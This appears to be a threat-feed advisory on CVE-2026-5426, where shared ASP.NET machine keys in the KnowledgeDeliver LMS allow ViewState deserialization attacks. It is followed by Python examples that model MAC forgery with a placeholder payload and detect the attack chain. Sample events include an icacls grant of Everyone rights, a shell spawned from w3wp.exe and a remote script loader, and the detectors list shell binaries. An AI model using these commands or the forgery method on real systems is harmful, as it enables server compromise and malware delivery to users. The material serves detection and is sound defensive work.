{"description":"Trending threats, MITRE ATT\u0026CK coverage, and detection metadata. Fed continuously.","feed_url":"https://feed.craftedsignal.io/tags/knowledgedeliver/feed.json","home_page_url":"https://feed.craftedsignal.io/","items":[{"_cs_actors":[],"_cs_cpes":[],"_cs_cves":[{"cvss":7.5,"id":"CVE-2026-5426"}],"_cs_exploited":false,"_cs_has_poc":false,"_cs_poc_references":[],"_cs_products":["KnowledgeDeliver"],"_cs_severities":["critical"],"_cs_tags":["knowledgedeliver","viewstate-deserialization","rce","web-shell","cobalt-strike","cve-2026-5426"],"_cs_type":"advisory","_cs_vendors":["Digital Knowledge"],"content_html":"\u003cp\u003eIn late 2025, Mandiant investigated a security incident involving a compromised KnowledgeDeliver web server. KnowledgeDeliver, a Learning Management System (LMS) by Digital Knowledge, was found to be vulnerable to unauthenticated Remote Code Execution (RCE) due to the use of identical pre-shared ASP.NET machine keys across multiple customer deployments before February 24, 2026. This vulnerability, tracked as CVE-2026-5426, allowed an unknown threat actor to inject malicious code into the LMS platform. The attacker\u0026rsquo;s goal was to compromise users visiting the site through web shell deployment, file tampering, and eventual Cobalt Strike BEACON infection of user workstations. 
Every ASP.NET deployment needs its own secret machine keys: anyone who holds the validationKey can produce a ViewState payload that passes MAC validation and is then deserialized by the server.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a KnowledgeDeliver instance that still uses the vendor\u0026rsquo;s pre-shared ASP.NET machine keys.\u003c/li\u003e\n\u003cli\u003eThe attacker builds a ViewState payload containing a serialized .NET object graph (a gadget chain that runs code when deserialized) and signs it with the known machine keys so that it passes MAC validation (CVE-2026-5426).\u003c/li\u003e\n\u003cli\u003eThe attacker sends the crafted payload in the \u003ccode\u003e__VIEWSTATE\u003c/code\u003e parameter of an HTTP POST request to the vulnerable KnowledgeDeliver server.\u003c/li\u003e\n\u003cli\u003eThe server accepts the MAC and deserializes the ViewState, executing the attacker\u0026rsquo;s code inside the \u003ccode\u003ew3wp.exe\u003c/code\u003e worker process.\u003c/li\u003e\n\u003cli\u003eThe attacker deploys the BLUEBEAM (.NET-based Godzilla) in-memory web shell inside \u003ccode\u003ew3wp.exe\u003c/code\u003e for persistence and command execution.\u003c/li\u003e\n\u003cli\u003eThe attacker runs \u003ccode\u003eicacls\u003c/code\u003e to grant \u0026ldquo;Everyone\u0026rdquo; full control of the web application directory, loosening its ACL so that files under the web root can be modified freely.\u003c/li\u003e\n\u003cli\u003eThe attacker modifies a JavaScript file to display a fake security alert that prompts users to install a malicious \u0026ldquo;security authentication plugin\u0026rdquo;.\u003c/li\u003e\n\u003cli\u003eThe modified JavaScript silently loads a remote script hosted on an attacker-controlled domain, ultimately leading to Cobalt Strike BEACON infection of user workstations.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-5426 gives an unauthenticated attacker remote code execution on KnowledgeDeliver servers. 
This can lead to web shell deployment, file tampering, and the infection of user workstations with malware such as Cobalt Strike BEACON. In the investigated incident, the modified JavaScript file displayed a fake security alert that tricked users into installing a malicious \u0026ldquo;security authentication plugin\u0026rdquo;, turning a server compromise into a workstation compromise. ViewState deserialization is guarded only by the MAC, so that guard is worth nothing once the validationKey is shared across deployments.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReplace the shared keys with a unique \u003ccode\u003e\u0026lt;machineKey\u0026gt;\u003c/code\u003e (validationKey and decryptionKey) per deployment and treat the values as secrets; the brief dates the shared keys to deployments set up before February 24, 2026.\u003c/li\u003e\n\u003cli\u003eMonitor the Windows Application log for Event ID 1316 from the \u003ccode\u003eASP.NET 4.0.30319.0\u003c/code\u003e source with event code 4009 (\u0026ldquo;Viewstate verification failed\u0026rdquo;). These also occur benignly after a key rotation or when nodes of a web farm hold different keys, so baseline them and alert on spikes or on failures from unfamiliar client addresses.\u003c/li\u003e\n\u003cli\u003eMonitor for unusual child processes of \u003ccode\u003ew3wp.exe\u003c/code\u003e (the IIS worker process), such as \u003ccode\u003ecmd.exe\u003c/code\u003e, \u003ccode\u003ewhoami\u003c/code\u003e, and \u003ccode\u003epowershell.exe\u003c/code\u003e, and for \u003ccode\u003eicacls\u003c/code\u003e granting \u0026ldquo;Everyone\u0026rdquo; access to the web root.\u003c/li\u003e\n\u003cli\u003eImplement file integrity monitoring for \u003ccode\u003e.js\u003c/code\u003e, \u003ccode\u003e.aspx\u003c/code\u003e, and \u003ccode\u003e.config\u003c/code\u003e files within the web root to detect unauthorized modifications, including the addition of remote script loaders.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect KnowledgeDeliver BLUEBEAM Webshell Deployment\u0026rdquo; to detect post-exploitation activity related to web shell deployment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-05-25T05:10:52Z","date_published":"2026-05-25T05:10:52Z","id":"https://feed.craftedsignal.io/briefs/2026-05-knowledgedeliver-viewstate-deserialization/","summary":"An unauthenticated remote code execution vulnerability, 
CVE-2026-5426, in Digital Knowledge's KnowledgeDeliver LMS platform, stems from ASP.NET machine keys shared across customer deployments and lets an unauthenticated attacker execute arbitrary code on the server; in the investigated incident this led to web shell deployment, file tampering, and Cobalt Strike infection of user workstations.","title":"KnowledgeDeliver ViewState Deserialization Vulnerability Exploitation","url":"https://feed.craftedsignal.io/briefs/2026-05-knowledgedeliver-viewstate-deserialization/"}],"language":"en","title":"CraftedSignal Threat Feed — Knowledgedeliver","version":"https://jsonfeed.org/version/1.1"}
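The MAC-forgery mechanism behind the brief above, as an added Python example appended after the feed entry (not code from the brief, from Mandiant, Digital Knowledge or Microsoft): a simplified model of ASP.NET ViewState MAC protection. Real ASP.NET wraps page state with ObjectStateFormatter and can mix a viewStateUserKey and a purpose string into the MAC, but the property that matters is the same: the server verifies an HMAC keyed with the machineKey validationKey before it deserializes, so whoever holds a key that is shared across deployments can sign a gadget chain that every such server will accept. The key values, the payload bytes and the `generate_machine_key` helper are constructed for the example; nothing here builds or runs a real gadget chain.

```python
import base64
import hashlib
import hmac
import secrets

MAC_LEN = 32  # HMAC-SHA256 digest length, matching validation="HMACSHA256"


def make_viewstate(serialized_state: bytes, validation_key: bytes) -> str:
    """Model of what the server does when it renders a page: append an HMAC
    over the serialized state and base64-encode the result into __VIEWSTATE."""
    mac = hmac.new(validation_key, serialized_state, hashlib.sha256).digest()
    return base64.b64encode(serialized_state + mac).decode("ascii")


def verify_viewstate(token: str, validation_key: bytes) -> bytes:
    """Model of the server-side check on POST: recompute the MAC and compare it
    in constant time. A mismatch is what ASP.NET reports as event code 4009
    ("Viewstate verification failed", Application log Event ID 1316)."""
    raw = base64.b64decode(token)
    if len(raw) <= MAC_LEN:
        raise ValueError("Viewstate verification failed")
    body, mac = raw[:-MAC_LEN], raw[-MAC_LEN:]
    expected = hmac.new(validation_key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(mac, expected):
        raise ValueError("Viewstate verification failed")
    return body  # only a MAC-valid body reaches the deserializer


def attacker_forges(known_key: bytes) -> str:
    """Attacker side: sign a chosen payload with a key they already hold. The
    bytes stand in for a serialized .NET gadget chain; nothing is executed."""
    return make_viewstate(b"<serialized-gadget-chain-placeholder>", known_key)


def server_accepts(token: str, server_key: bytes) -> bool:
    """True if the modelled server would pass the token on to deserialization."""
    try:
        verify_viewstate(token, server_key)
        return True
    except ValueError:
        return False


def generate_machine_key() -> dict:
    """Per-deployment replacement values in the shape web.config's <machineKey>
    element expects: a 64-byte validationKey for HMACSHA256 and a 32-byte
    decryptionKey for AES-256, both as hex. Constructed helper; store the
    output as a secret and rotate it like any other credential."""
    return {
        "validationKey": secrets.token_hex(64).upper(),
        "decryptionKey": secrets.token_hex(32).upper(),
        "validation": "HMACSHA256",
        "decryption": "AES",
    }


def demo() -> tuple:
    """Returns (accepted_with_shared_key, accepted_with_unique_key)."""
    # Constructed stand-in for a key that shipped identically to every customer.
    shared_key = bytes.fromhex("0123456789ABCDEF" * 8)
    unique_key = bytes.fromhex(generate_machine_key()["validationKey"])
    forged = attacker_forges(shared_key)
    return server_accepts(forged, shared_key), server_accepts(forged, unique_key)


if __name__ == "__main__":
    print(demo())  # (True, False)
```

The same forged token is accepted by a server still on the shared key and rejected by one that rotated to its own; the rejection is the only point at which the second server learns anything, which is why the 4009/1316 failure audit is worth collecting.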
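Detection logic for the recommendations in the brief above, as an added Python example appended after the feed entry (not the Sigma rule the brief refers to, and not code from the brief): one function per check, run over a small set of constructed event records shaped like a Windows Application log entry, Sysmon process-creation events and a file-integrity-monitoring record. The field names, the web-root path, the hashes and the placeholder domain example.invalid are assumptions for the example; real telemetry will need the accessors adapted to the SIEM's schema.

```python
import re

# Constructed sample telemetry (not real logs). Field names loosely follow
# Windows event / Sysmon naming; adapt the accessors to your SIEM schema.
WEB_ROOT = r"c:\inetpub\wwwroot\knowledgedeliver"   # assumed install path, lower-case
SUSPICIOUS_CHILDREN = {"cmd.exe", "powershell.exe", "pwsh.exe", "whoami.exe"}
WATCHED_EXT = (".js", ".aspx", ".config")
SYSMON = "Microsoft-Windows-Sysmon/Operational"

SAMPLE_EVENTS = [
    # 0: ASP.NET health-monitoring failure audit for a bad ViewState MAC
    {"Channel": "Application", "Provider": "ASP.NET 4.0.30319.0", "EventID": 1316,
     "Message": "Event code: 4009\nEvent message: Viewstate verification failed. "
                "Reason: The viewstate supplied failed integrity check."},
    # 1: IIS worker process spawning a shell (post-exploitation command execution)
    {"Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "CommandLine": "cmd.exe /c whoami"},
    # 2: ACL loosened on the web root
    {"Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\icacls.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'icacls "C:\inetpub\wwwroot\KnowledgeDeliver" /grant Everyone:(OI)(CI)F /T'},
    # 3: FIM record for a JavaScript file whose new content pulls a remote script
    #    (example.invalid is a reserved placeholder, not the actor's domain)
    {"Channel": "FIM", "Path": r"C:\inetpub\wwwroot\KnowledgeDeliver\scripts\common.js",
     "OldHash": "a1" * 32, "NewHash": "b2" * 32,
     "Content": "var s=document.createElement('script');"
                "s.src='https://example.invalid/plugin.js';document.head.appendChild(s);"},
    # 4: benign worker-process start, must not alert
    {"Channel": SYSMON, "EventID": 1, "Image": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "w3wp.exe -ap KnowledgeDeliver"},
]

# Matches `x.src = 'http...'` assignments and `<script src="http...">` tags.
REMOTE_LOADER = re.compile(r"""(?:\.src\s*=\s*|<script[^>]*\ssrc=)["']https?://""", re.I)


def _base(path: str) -> str:
    """File-name component of a Windows path, lower-cased."""
    return path.rsplit("\\", 1)[-1].lower()


def viewstate_mac_failure(ev: dict) -> bool:
    """Event ID 1316 from the ASP.NET source carrying event code 4009."""
    return (ev.get("Channel") == "Application"
            and ev.get("Provider") == "ASP.NET 4.0.30319.0"
            and ev.get("EventID") == 1316
            and "Event code: 4009" in ev.get("Message", ""))


def w3wp_suspicious_child(ev: dict) -> bool:
    """Shell or recon binary started directly by the IIS worker process."""
    return (ev.get("Channel") == SYSMON and ev.get("EventID") == 1
            and _base(ev.get("ParentImage", "")) == "w3wp.exe"
            and _base(ev.get("Image", "")) in SUSPICIOUS_CHILDREN)


def icacls_everyone_on_webroot(ev: dict) -> bool:
    """icacls granting Everyone rights on the application directory."""
    cl = ev.get("CommandLine", "").lower()
    return (ev.get("Channel") == SYSMON and ev.get("EventID") == 1
            and _base(ev.get("Image", "")) == "icacls.exe"
            and "/grant" in cl and "everyone:" in cl and WEB_ROOT in cl)


def webroot_file_tampered(ev: dict) -> bool:
    """Hash change on a watched file type under the web root."""
    path = ev.get("Path", "").lower()
    return (ev.get("Channel") == "FIM" and path.startswith(WEB_ROOT)
            and path.endswith(WATCHED_EXT) and ev.get("OldHash") != ev.get("NewHash"))


def remote_script_loader_added(ev: dict) -> bool:
    """Tampered file whose new content loads a script from an external origin."""
    return webroot_file_tampered(ev) and bool(REMOTE_LOADER.search(ev.get("Content", "")))


RULES = [viewstate_mac_failure, w3wp_suspicious_child, icacls_everyone_on_webroot,
         webroot_file_tampered, remote_script_loader_added]


def detect(events) -> list:
    """Return (event_index, rule_name) for every rule that fires on every event."""
    return [(i, rule.__name__) for i, ev in enumerate(events) for rule in RULES if rule(ev)]


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The 1316/4009 check is the noisiest of the five: a key rotation or a web farm with mismatched machine keys produces the same audit for legitimate users, so in production it belongs behind a baseline or a correlation with the process and file rules rather than as a stand-alone alert.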